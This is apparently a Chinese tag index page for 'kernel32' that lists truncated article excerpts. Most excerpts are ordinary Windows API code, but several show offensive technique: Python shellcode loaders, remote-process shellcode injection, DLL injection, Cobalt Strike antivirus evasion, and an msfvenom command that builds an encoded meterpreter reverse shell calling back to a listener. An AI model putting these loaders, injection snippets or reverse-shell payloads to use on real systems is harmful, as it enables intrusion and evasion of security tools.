首页 > TAG信息列表 > kernel32

C# 判断文件是否被占用

using System.IO; using System.Runtime.InteropServices; namespace DarkBlue.FileOccupied { public sta class FileHlper { [DllImport("kernel32.dll")] public static extern IntPtr _lopen(string lpPathName, int iReadWrite);

我的shellcode loader观-1

包含内容: 1.传统的shellcode loader 2.Python中的加密loader 3.Python相对于shelcode load 的优势 4.cython帮助我们将.py转.c 5.Python中源码混淆工具分享 1 . shellcode loader 这是一个源码: import ctypes shellcode = bytearray(b'') ctypes.windll.kerne

X86汇编 使用DwToXX类型API的注意问题

今日同学问到一个问题,关于下面的汇编程序为什么没有输出? .386 .model flat,stdcall option casemap:none include Stdlib.Inc includelib Stdlib.lib include kernel32.inc includelib kernel32.lib .dataa db 64 dup(0)b db 64 dup(0)len db 0

kernel32!OpenFile与ntdll!NtOpenFile

kernel32!OpenFile与ntdll!NtOpenFile kernel32!OpenFile并不是直接调用的ntdll!NtOpenFile,其调用的是ntdll!NtCreateFile。 ntdll!NtOpenFile ntdll!NtOpenFile函数并没有导出,如果要调用的话需要GetProcAddress动态获取。 typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Sta

在Windows 10的cmd输出彩色文本

# termcolor outputs stuff like '\033[0m'. It doesn't work in Windows 10's cmd. import sys from ctypes import * user32 = CDLL('user32.dll'); kernel32 = CDLL('kernel32.dll') # https://docs.microsoft.com/en-us/windo

CobaltStrike使用-第九篇-免杀

本篇将会介绍CS payload免杀工具的使用 文章目录 杀毒软件杀软常见扫描方式杀软扫描引擎常见免杀技术 免杀工具使用HanzoInjectionInvoke-PSImagePython脚本封装Artifact KitVeil Evasion免杀插件 常规杀毒软件的目的就是发现已知病毒并中止删除它,而作为攻击者则需要

不要迷恋我,我只是利用Python修改了游戏内存

前言   大家好,我叫善念。上篇文章我许了一个愿,就是想让大家多多关注我,然后我的粉丝就蹭蹭地涨了好几百,谢谢大家的厚爱。可是我发现粉丝是涨了,三连变少了,谢谢大家这次给我三连,我一定再接再厉。有问题留在评论区,我会一一回复,谢谢大家! 很多人学习python,不知道从何学起。 很多人学

加载shellcode到32位Windows程序远程进程中

BOOL WINAPI LoadDll(HANDLE hProcess,LPVOID lpBuf,int cbBuf) { BOOL br = FALSE; LPVOID m_lpData = VirtualAllocEx(hProcess, NULL,cbBuf,MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (m_lpData==NULL) { goto cleanup0; } if(!WriteProcessMemory(hProces

python shellcode加载器

默认是x64位的msf from ctypes import * from ctypes import wintypes import ctypes buf = b"" buf += b"\x56\xff\xd5" ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf)) LPBYTE = POINTER(c_byte) ctype

使用Visual C++高版本的XP支持生成带boost执行文件在XP上报kernel32缺函数

典型症状 使用Visual Studio 2019,安装“对VS 2017 (v141)工具的C++ Windows XP支持”后,用该v141_xp平台工具集生成的执行文件在Windows XP SP3下仍无法运行,Release版本报错,Debug版本提示“在KERNEL32.DLL中找不到xxxxxx”,典型的找不到的有InitializeSRWLock或InitializeCriticalSe

20182228 实验四《Python程序设计》实验报告

课程:《Python程序设计》班级: 201822姓名: 李卓伦学号:20182228实验教师:王志强实验日期:2020年6月30日必修/选修: 公选课   1.实验内容 python综合实践——游戏(破解)   2. 实验过程及结果 (1) 利用import win32gui,获取找到这个窗口的进程,利用win32process.GetWindowThreadProcessId获

C#简繁体转换方法(kernel32.dll)

C#简繁体转换方法(kernel32.dll) 2.import kernel32.dll 复制  保存 [DllImport("kernel32.dll", EntryPoint = "LCMapStringA")] public static extern int LCMapString( int Locale, int dwMapFlags, byte[] lpSrcStr, int cchSrc, byte[] lpDestStr, int c

创建ini文件,读文件和写文件

[DllImport("kernel32")] private static extern long WritePrivateProfileString(string section, string key, string val, string filePath); [DllImport("kernel32")] private static extern int GetPrivateProfileString(string section, string key

无法定位程序输入点 AddDllDirectory 于动态链接库 KERNEL32.dll

今天,在电脑刚安装完Windows 7系统后准备打驱动,结果所有驱动都无法安装,报错“无法定位程序输入点 AddDllDirectory 于动态链接库 KERNEL32.dll”   解决方法: 去微软官网下载 windows6.1-kb2533623-x64.msu 补丁程序,安装完成后重启计算机即可,微软官网下载链接已挂,这里提供下载链接

C# 利用动态库DllImport("kernel32")读写ini文件

1 ini文件读写            kernel32.dll是Windows中非常重要的32位动态链接库文件,属于内核级文件。它控制着系统的内存管理、数据的输入输出操作和中断处理,当Windows启动时,kernel32.dll就驻留在内存中特定的写保护区域,使别的程序无法占用这个内存区域。         为什么

一个有趣的东西,检查64位系统中的进程是32位还是64位

int GetResourceId(void) { typedef BOOL (*P_IsWow64Process)(HANDLE, BOOL *); HMODULE kernel32 = LoadLibrary(L"kernel32.dll"); P_IsWow64Process __sys_IsWow64Process = (P_IsWow64Process)GetProcAddress(kernel32, "IsWow64Pr

shellcode加载器编写

Python3 shellcode通用加载器 #!/usr/bin/python3 import ctypes #shellcode 放这个位置 c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" shellcode = bytearray(c) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

Python——dll注入

import sys from ctypes import * FAGE_READWRITE = 0x04 PROCESS_ALL_ACCESS = 0x001F0FFF VIRTUAL_MEN = (0x1000 | 0x2000) kernel32 = windll.kernel32 user32 = windll.user32 pid = sys.argv[1] dll_path = sys.argv[2] dll_len = len(dll_path) h_process = kernel

msvsmon远程调试启动时挂起真正有效办法

正确方法 while (!Debugger.IsAttached) { Thread.Sleep(1000); } //下面开始你的代码 以下2中检测调试都无效 [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] private static extern bool IsDebuggerPresent(); [DllImport(

gcc -O2 优化,到底做了什么? 程序都不能正常运行了。

一个项目开发到维护有五年时间了。 今天在项目中加入了一段代码后,软件启动后,窗口显示不出来了。 加入的代码: HMODULE hDll_kernel32 = LoadLibrary("kernel32.dll"); // 加载 kernel32.dll if(hDll_kernel32) { FARPROC proc = GetProcAddress(hDll_kernel32, "

提示错误:“已加载“C:\Windows\SysWOW64\kernel32.dll”。“包括”/“排除”设置禁用了加载功能”

解决方案:工具 ->选项 -> 调试 ->符号  中箭头部分勾选上就可以了。 参考:https://blog.csdn.net/weixin_41605888/article/details/89226311 点赞 收藏 分享 文章举报 Rebirth_2017 发布了34 篇原创文章 · 获赞 12 · 访问量 4万+ 私信

payload分离免杀

shellcode loader 借助第三方加载器,将shellcode加载到内存中来执行。 https://github.com/clinicallyinane/shellcode_launcher msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c 靶机执行 shellcode

微信 电脑版 HOOK(WeChat PC Hook)- 远程线程注入dll原理

Windows加载dll的特性   1、Windows系统中,每个exe软件运行的时候,会加载系统模块kernel32.dll   2、所有加载进exe软件的系统模块kernel32.dll,内存地址都是一样   3、kernel32.dll中的LoadLibrary()函数用于加别载的dll   4、dll内的函数相对dll模块的地址不变(偏移不变) 注

使用CBrother的CLIB库调用windows的API

使用CBrother的CLIB库调用windows的API 2.1.0版本CBrother加入了CLib库,最新需要写一个工具,根据路径查杀一个Windows进程,研究了一下,CLib库的用法,感觉还是比较灵活的。 首先我要明确每一个API在系统的哪一个dll里面,我一般都是去微软官网查这个API。(https://docs.microsoft.com/zh-cn

向JNA类Java(Kernel32)添加另一个方法

我试图使用WIN32 dll中的方法,但JNA中未包含该方法. 方法是GetProductInfo 我在单独的项目中尝试此工作: public interface Kernel32 extends Library { public boolean GetProductInfo(int dwOSMajorVersion,int dwOSMinorVersion, int dwSpMajorVersion, int dwSpM